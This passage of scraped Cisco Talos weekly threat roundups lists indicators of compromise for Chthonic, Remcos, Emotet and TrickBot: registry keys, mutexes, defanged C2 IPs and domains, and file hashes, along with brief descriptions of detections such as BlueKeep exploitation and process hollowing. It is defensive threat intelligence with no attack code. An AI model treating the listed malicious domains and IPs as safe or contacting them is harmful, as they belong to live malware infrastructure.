ThreatGrid\n\n[](<https://1.bp.blogspot.com/-DLX6v1K4KyU/XU3Q_QVOokI/AAAAAAAACUM/ki5QgXGwU54XUE5f6J1yjpyfFCZ0TeTngCLcBGAs/s1600/5d9dc6e667bd105d7e2e77162e87e94b0c5a72be94c1ae726e45ccf4d23753bb_tg.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-8dV01_lMY_8/XU3RFX7nf-I/AAAAAAAACUQ/xWLg3y2zLOIKtVzwVKAqEr7sKlaOgGbkQCLcBGAs/s1600/213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5_umbrella.png>)\n\n \n\n\n \n\n\n### Win.Malware.Chthonic-7101817-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 24 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 24 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 24 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 24 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 2827271685 ` | 24 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`20[.]45[.]1[.]107` | 21 \n`40[.]91[.]124[.]111` | 21 \n`192[.]42[.]119[.]41` | 18 \n`40[.]67[.]189[.]14` | 15 \n`20[.]41[.]46[.]145` | 8 \n`192[.]42[.]116[.]41` | 6 \n`40[.]90[.]247[.]210` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`dnshkjashsdk3d111[.]ru` | 24 \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`\\TEMP\\005F5E~1.EXE` | 1 \n`\\TEMP\\1B106F~1.EXE` | 1 \n`\\TEMP\\0956E4~1.EXE` | 1 \n`\\TEMP\\382BAE~1.EXE` | 1 \n`\\TEMP\\00BA93~1.EXE` | 1 \n`\\TEMP\\12CC7F~1.EXE` | 1 \n \n#### File Hashes\n\n` 005f5e12924dad7fe014a84db45f13429f6ece0b8247f5d352d715b2846c0c4f 00ba939c36fa3b49267f278dc9bb198bc9ae990ce888720048bea52a40cf1c23 0956e4f5453664330032f4d772aba4fc67c67543ca6b5b5970277d3509c0b947 12cc7fd46b6a47ac1c87526633c7a608d31275b31c885f8f47bb994d8ae19e90 17e720effe9bb9123f12df8149180130f8239870cf0d9267f67cf476b6ab44e5 1b106ffffabfe8c46bca9ad44e1fd47a2150a99a701452d4a6d2e51fb968a1af 382baee7e059546686749c2e25e7077db13f724e67629aa253033b53c4aff934 38fa5765572ad2cd028f6aa284d0b780b881d390dd5a8ae32c06d39e7442c026 42c5dd7eebdd5bd210832a6588259e33e737208817c4c1817615b3995c3ac378 4471cabd599d69896184f4e9264f377961488fb4c6cdf41992e0f5b2096c9899 46901064a8beca5f66dd0e9072feab0abb6ec3223b54f6bad81959a306915b47 62828391fca3a6d82749ca15cd2eb5d28153001457df7f1806377235a95603f5 63641d47b507920bd79600352d71655abed663ebe9347ccc5f7841b9dcb95d1b 73b71b837f43a97bfab5c6f541d54b7b090fef3893a0e78b769140a946ba162a 75da2447c69b6b0d78ace3c73e9302688b46cf1bdddac5c61d0c7c8403d39036 7a38d305151c979898e46d7d52dcb8bd4dc67485415a7d122c81facd320bcba8 8be6459aa2282ae9cf52ec766d7c8c55721988ba866339e358d15ae47fbae61f 8c1ab54da3a2372a624d22d902278e048942e9a495b71d330f1eee4073b14eb7 8c495bba75c5ab08e66063bd323525502188899663ad8ac5183baa2a42583bb8 8e3fd8961f232fdbf26019c56901c76db886ed56f86fba8c2f3f0631d33f969e a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44 acc883924cc2e4b6f5f979a2586e2246a9837faa07702c6a18f90a086d681796 aebb9e807054a61b9125efa05507a9e2cdc6812bd286c007367713d1f377b514 b01cefc142aee229491e1b19a32888b921f1935c4d472807b7d115dc568356e4 b50a5542b24d20aa60a3614699c36f4f75062c7492955b9785fad0df4d0c1525 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-H1zjQzyl6yI/XU3RWxuA7bI/AAAAAAAACUg/sh3k5-9fGvc9qmOHzPATQBhNiRqPi9sGgCLcBGAs/s1600/a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rMo2F4NgHYw/XU3RbGvDnjI/AAAAAAAACUk/UMseNSNGYAUgPb-fm091l6WcgTk3wdz5wCLcBGAs/s1600/a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-BDpwznCi30I/XU3RgVhoJ7I/AAAAAAAACUo/5RxS4nSS59osV7OJ3wsnboj_yF6KpHEaACLcBGAs/s1600/a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44_umbrella.png>)\n\n \n\n\n### Win.Malware.Remcos-7101023-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\REMCOS-LOPOXR ` | 25 \n`<HKCU>\\SOFTWARE\\REMCOS-LOPOXR \nValue Name: exepath ` | 25 \n`<HKCU>\\SOFTWARE\\REMCOS-LOPOXR \nValue Name: lic ` | 25 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 25 \n`Remcos-LOPOXR` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`95[.]140[.]125[.]58` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\Tasks\\Stencilens0.job` | 25 \n`%APPDATA%\\antepenuit.pif` | 25 \n`%System32%\\Tasks\\Stencilens0` | 25 \n \n#### File Hashes\n\n` 081f8d61a3cd912e00e9f53f6a8a3923164cb86205cdaab63abd9b2814ed9777 0a7cfd1b34af81f40d8f05f85bcfa9139bf9ec2eff82fcda1fba409b5a7650f2 0bed354bdcb152cbd012fe1c37d53c8c02da11c11084e8eb83bf577bdd80a464 0d0a83234404e0c08958aafcb6910f6cdfd7dc75d9713bf654c89b99fc341bdc 0d271c5c9ca84e2ab86f6c95d32802e7ec64b846d07b7bf81d0f82409b1b2101 1092677328703cc000e9c63be2b0a2f46103c14f053e9ee079ffd7f0ca2d6f8f 1831367e74cc96e0f72ec11f054525e6c024215bde7b61f110f9b73338ce03cf 1a801a28dfffaea7742f1d467a2c80bb8632b39db214d22abc804f0bc6515cc6 2027c7d8d4403334509ae483d7e0c8be28640a39d4bd9441f87cdc259b92ca4c 2e16d6892291790348a9ebe49ca192925a8db1a7a286c0fbb44c30ba1dff74e2 354c76d9316c5ba1edd6b052f361ec42e925b878915879c1ca903f81b05bfd7b 36c6f434e27087f707a813495e82bdbeac383507ce5a2ca3816e4557a4cddb5e 376746cbbf27f98f9f07676bdb6a5e556fee27b1ae1c388416f17d5e4bc4c62f 392474631d8c58ec089b896569d6e362484865b479c85e2c0906b87349bce68f 3adb3198ca6ac80a842b6aba596fef43eda6aca0f32dbdf59d60133eabde541d 40b75ec8743801bfcbac60c8f0b232971aa61bfb031fe829132a8537c63b9a41 40cf7790bd379a14cecc933b48e6f341164ad872d5ee61136b91092cbfe14aba 49c149ba04e9af98c5da19d305556af3d7cdacf6e2044abfef604b0e5bb38d29 54a0550408c68795a9652e18a4e3820cca6c16246c2e8198497e795dba448644 585061420029af8f635eefe1834874a422d140b8adfbc77d0e789ea9d4ade500 5914996ccdfda579afbd3116cae43d5bd35db5eee27545a60ddef3270af351f1 5a756ce1c997dd1615ea2fc97e5dd3cfcbc29a5f848e5ea6ede37e3d526d4ce3 5e7c49bef106709d6cfc9d85b8d82dc0583f42c1701cb7990e700914db842186 5f9034f63a3cf362b1d2f7baf35a7fadceccd2add363bf7ef3cae4e95a6afb86 5faf5309caaeb3ed3d1b4825b55646c83d769d22c226420bb6418e037cd2f029 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4z-4bO77Lzs/XU3RwPft74I/AAAAAAAACU0/uoDbEVkJTKQRWVGv4W95-TFIoXCCY3B8ACLcBGAs/s1600/392474631d8c58ec089b896569d6e362484865b479c85e2c0906b87349bce68f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NxfAdHYHNiY/XU3R1DOsDEI/AAAAAAAACU8/5wVY6_4vSeQfByumNeNjjHwOKVQznQuYACLcBGAs/s1600/392474631d8c58ec089b896569d6e362484865b479c85e2c0906b87349bce68f_tg.png>)\n\n \n\n\n \n\n\nExploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (2337) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nMadshi injection detected \\- (1399) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nTrickbot malware detected \\- (1212) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nExcessively long PowerShell command detected \\- (1002) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (466) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (297) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (152) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nDealply adware detected \\- (118) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nPossible fileless malware download \\- (95) \nA site commonly used by fileless malware to download additional data has been detected. Several different families of malware have been observed using these sites to download additional stages to inject into other processes. \nIcedID malware detected \\- (52) \nIcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections. \n", "cvss3": {}, "published": "2019-08-09T13:28:08", "type": "talosblog", "title": "Threat Roundup for August 2 to August 9", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-08-09T13:28:08", "id": "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6_zbjoDpG84/threat-roundup-0802-0809.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T19:22:56", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 13 and Dec. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2019/12/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7451163-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.TrickBot-7455405-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Packed.Dridex-7447905-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine. \nWin.Packed.Razy-7450491-0 | Packed | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Dropper.NetWire-7454096-1 | Dropper | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Trojan.Tofsee-7450732-0 | Trojan | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control. \nDoc.Downloader.Sagent-7454309-0 | Downloader | Sagent downloads and executes a binary using PowerShell from a Microsoft Word document. \nWin.Malware.Gandcrab-7454521-1 | Malware | Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension \".GDCB,\" \".CRAB\" or \".KRAB\". Gandcrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft. \nWin.Trojan.HawkEye-7455512-1 | Trojan | Hawkeye is an information stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7451163-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\INTERFACE\\{BEF6E003-A874-101A-8BBA-00AA00300CAB} ` | 10 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecisionReason ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecision ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadNetworkName ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDetectedUrl ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Description ` | 2 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecisionTime ` | 2 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A40-032075206B43}\\2.0\\FLAGS ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A40-032075206B43}\\2.0\\0 ` | 1 \n`<HKCR>\\TYPELIB\\{C4EDCADC-BC75-481F-8A40-032075206B43}\\2.0\\0\\WIN32 ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 2 \n`Global\\M98B68E3C` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]108[.]65[.]228` | 8 \n`100[.]116[.]148[.]111` | 8 \n`100[.]112[.]136[.]191` | 8 \n`100[.]89[.]177[.]62` | 8 \n`100[.]93[.]135[.]190` | 8 \n`168[.]235[.]82[.]183` | 2 \n`96[.]234[.]38[.]186` | 2 \n`120[.]51[.]83[.]89` | 2 \n`204[.]197[.]244[.]176` | 2 \n`149[.]202[.]153[.]251` | 1 \n`103[.]47[.]185[.]215` | 1 \n`107[.]180[.]41[.]254` | 1 \n`69[.]16[.]254[.]127` | 1 \n`82[.]145[.]43[.]153` | 1 \n`139[.]255[.]47[.]211` | 1 \n`37[.]228[.]137[.]204` | 1 \n`157[.]7[.]231[.]227` | 1 \n`202[.]238[.]198[.]32` | 1 \n`202[.]238[.]198[.]30` | 1 \n`60[.]36[.]166[.]212` | 1 \n`192[.]1[.]4[.]230` | 1 \n`50[.]31[.]174[.]165` | 1 \n`113[.]43[.]208[.]199` | 1 \n`202[.]130[.]62[.]24` | 1 \n`103[.]253[.]113[.]131` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`adichip[.]com` | 10 \n`grafdesign[.]pl` | 8 \n`dcjohnsonassociates[.]com` | 8 \n`global-ark[.]co[.]jp` | 8 \n`acadmi[.]co[.]uk` | 8 \n`mail[.]1and1[.]com` | 1 \n`587[.]hexabyte[.]tn` | 1 \n`child-pro[.]com` | 1 \n`imap[.]e-apamanshop[.]com` | 1 \n`sg2plcpnl0259[.]prod[.]sin2[.]secureserver[.]net` | 1 \n`mx1[.]retailconnection[.]co[.]za` | 1 \n`smtp[.]consulmexrio[.]com[.]br` | 1 \n`mail[.]ahg[.]com[.]mx` | 1 \n`mail[.]cassado[.]com[.]pe` | 1 \n`pop[.]aoishokai[.]co[.]jp` | 1 \n`mail[.]thebasechurch[.]org` | 1 \n`miyataseika[.]sakura[.]ne[.]jp` | 1 \n`mail[.]uberved[.]com` | 1 \n`mail[.]victoriasuitehotel[.]com[.]pe` | 1 \n`pop3[.]jinrikiudon[.]co[.]jp` | 1 \n`pop[.]e-apamanshop[.]com` | 1 \n`bh-35[.]webhostbox[.]net` | 1 \n`pop[.]orange[.]jo` | 1 \n`mail[.]muzamilglass[.]com` | 1 \n`mail[.]aceinterioruae[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\576.exe` | 10 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat` | 2 \n \n#### File Hashes\n\n` 24547a6e7ab9766fc85644033e27414deb2409367fae21fdb722174a605a34ad 27e0a7b8c18893b22583e19ef7634fd79fc9cb5daed862f794960ddaa19b58dc 363ecad264cfe3cdef52119a1b78c495d362efa7df5d38d182ce76dbf31facfd 3f0e86777e4a9b3285a9203907f5a7e6f804e7cfda3300b857e8712ac2030e57 5e31045309ab5ecbef3701c9023fc5a4631bf653347447484b652e434b086966 67c3eabb23b74c1a6ee4d384fa6f248c4a2492d998e7aaf0a1ce3f878a8ff715 6ba2589b00a95ff4ce9f7eee550bdffa6ef57dbf0212384ce38696b0c13778bd 7b0c9b63d9e8c6399e13354176e41bde009c94053b0566ef4506b17c14b46ab7 9100a8c4f2f6dd2bde134162d6b70f0d9ac99db4ff1f4551407a8a078ce2c35c c0197a5e801dee8d80df024c32a616c04539a56108b2225b469c7eb5fede5447 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-mpa4EVqp_ns/Xf0C_5O5QnI/AAAAAAAADCI/Bnenu7XaNyU-j8xahDBEzyTDl50QgcHbwCLcBGAsYHQ/s1600/3f0e86777e4a9b3285a9203907f5a7e6f804e7cfda3300b857e8712ac2030e57_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NEG67E4Mz5M/Xf0DNc4qPJI/AAAAAAAADCM/hX-ZTiN4bBY_i3bX_XvJivgsaNjuLJ49wCLcBGAsYHQ/s1600/6ba2589b00a95ff4ce9f7eee550bdffa6ef57dbf0212384ce38696b0c13778bd_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-1rcSJ0oxfYw/Xf0Dzt07JpI/AAAAAAAADCc/R_EgDjOn-lcZtSz1cZRJG_Gq-qKag71vwCLcBGAsYHQ/s1600/9100a8c4f2f6dd2bde134162d6b70f0d9ac99db4ff1f4551407a8a078ce2c35c_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-a3Axop96p_k/Xf0D4SmDspI/AAAAAAAADCg/iMDtVAuX5XYmBsPHmwtqYj1ziOrT8Z3QgCLcBGAsYHQ/s1600/67c3eabb23b74c1a6ee4d384fa6f248c4a2492d998e7aaf0a1ce3f878a8ff715_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.TrickBot-7455405-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 20 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`167[.]86[.]123[.]83` | 4 \n`5[.]34[.]177[.]50` | 4 \n`193[.]37[.]213[.]110` | 4 \n`170[.]84[.]78[.]224` | 3 \n`216[.]239[.]36[.]21` | 2 \n`216[.]239[.]38[.]21` | 2 \n`117[.]196[.]233[.]79` | 2 \n`85[.]143[.]220[.]41` | 2 \n`5[.]2[.]72[.]84` | 2 \n`146[.]185[.]219[.]94` | 2 \n`185[.]62[.]189[.]132` | 2 \n`107[.]172[.]29[.]108` | 2 \n`3[.]224[.]145[.]145` | 1 \n`200[.]21[.]51[.]38` | 1 \n`31[.]214[.]138[.]207` | 1 \n`181[.]129[.]104[.]139` | 1 \n`190[.]142[.]200[.]108` | 1 \n`181[.]113[.]28[.]146` | 1 \n`177[.]105[.]242[.]229` | 1 \n`185[.]66[.]13[.]65` | 1 \n`212[.]124[.]117[.]25` | 1 \n`64[.]44[.]133[.]151` | 1 \n`107[.]172[.]208[.]51` | 1 \n`146[.]185[.]253[.]132` | 1 \n`172[.]82[.]152[.]130` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 2 \n`myexternalip[.]com` | 2 \n`ipecho[.]net` | 1 \n`checkip[.]amazonaws[.]com` | 1 \n`api[.]ipify[.]org` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\System Network Extensions` | 20 \n`%APPDATA%\\speedlink` | 20 \n`%APPDATA%\\speedlink\\data` | 20 \n`%APPDATA%\\speedlink\\settings.ini` | 20 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 20 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 20 \n`%APPDATA%\\SPEEDLINK\\<original file name>.exe` | 20 \n \n#### File Hashes\n\n` 14c4ecbdba8a97d3157dcbbe5be3ab9270ba9142e6ea6286634e8b9658db5f20 